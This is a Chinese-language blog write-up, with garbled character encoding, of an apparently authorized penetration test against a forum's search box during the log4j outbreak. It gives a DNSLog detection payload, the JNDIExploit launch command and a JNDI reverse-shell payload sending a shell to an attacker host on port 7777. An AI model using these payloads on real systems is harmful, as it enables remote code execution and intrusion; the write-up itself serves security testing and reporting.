更新時(shí)間:2021.12.19
參考文檔:https://www.yuque.com/u8021480/crow/dg9xax
在去年log4j
漏洞剛爆發(fā)的時(shí)候,很多平臺都存在漏洞,當(dāng)時(shí)也在第一時(shí)間在有授權(quán)的情況下對某論壇進(jìn)行了滲透測試,結(jié)果發(fā)現(xiàn)存在漏洞,報(bào)告之后,漏洞也被很快修復(fù)。
本次對該滲透過程進(jìn)行一個(gè)簡單的記錄,整個(gè)過程非常的簡單,因?yàn)槁┒磩偝鰜?,也沒有什么waf
,所以很快就拿下了。以下過程已進(jìn)行脫敏,漏洞均已修復(fù)。
1. Dnslog漏洞探測
云端攻擊機(jī)kali : 1x3.xxx.xx2.9
目標(biāo)機(jī):http://testxxx.cn/
中轉(zhuǎn)文件:JNDIExploit-1.2-SNAPSHOT.jar
1.1 payload描述
在log4j
漏洞中,一般構(gòu)造諸如:${jndi:ldap://6bbs.dnslog.cn/test}
之類的漏洞,但是在很多時(shí)候,因?yàn)橛?code>//的存在,可能會觸發(fā)系統(tǒng)自動將其作為url
鏈接訪問,導(dǎo)致誤判,因此在這里可以使用新的payload
進(jìn)行測試:
${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}
在這里可以顯示起版本信息,如果能夠顯示,則證明一定存在漏洞。
1.2 測試
去dnslog平臺申請一個(gè)域名:gx.dnslog.cn
直接構(gòu)造:
${jndi:ldap://${sys:java.version}.gx.dnslog.cn}
然后在論壇的搜索框執(zhí)行:
此時(shí)DNSLOG
平臺有數(shù)據(jù),證明存在漏洞:
既然存在漏洞,那就試試能否拿下RCE
。
2. log4j RCE
云端攻擊機(jī)kali : 1x3.xxx.xx2.9
目標(biāo)機(jī):http://testxxx.com/
中轉(zhuǎn)文件:JNDIExploit-1.2-SNAPSHOT.jar
2.1 準(zhǔn)備工作
直接在攻擊機(jī)上開啟JNDIExploit-1.2-SNAPSHOT.jar
命令如下:java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻擊機(jī)ip地址
通過漏洞探尋得知測試派的搜索框存在log4j漏洞,直接在這里構(gòu)造exp即可:
${jndi:ldap://攻擊機(jī)ip:1389/Basic/ReverseShell/攻擊機(jī)ip/7777}
其中,去請求攻擊機(jī)的的1389
端口,并且將shell
反彈給攻擊機(jī)的7777
端口。
在攻擊機(jī)上另啟一個(gè)命令行,監(jiān)聽7777
端口:
此時(shí)狀態(tài)如下:
2.2 攻擊測試
直接在輸入框里面輸入上面構(gòu)造好的exp
:
直接回車,shell就彈回來了:
判斷當(dāng)前是物理機(jī)還是Docker
:
cat /proc/1/cgroup
此時(shí)顯示為物理機(jī)。(參考資料:[https://blog.csdn.net/mar_ljh/article/details/109011822](https://blog.csdn.net/mar_ljh/article/details/109011822)
)
測試結(jié)束,開始寫報(bào)告。文章來源:http://www.zghlxwxcb.cn/news/detail-425429.html
3. 漏洞修復(fù)
https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqBQ文章來源地址http://www.zghlxwxcb.cn/news/detail-425429.html
到了這里,關(guān)于【實(shí)戰(zhàn)】一次簡單的log4j漏洞測試的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!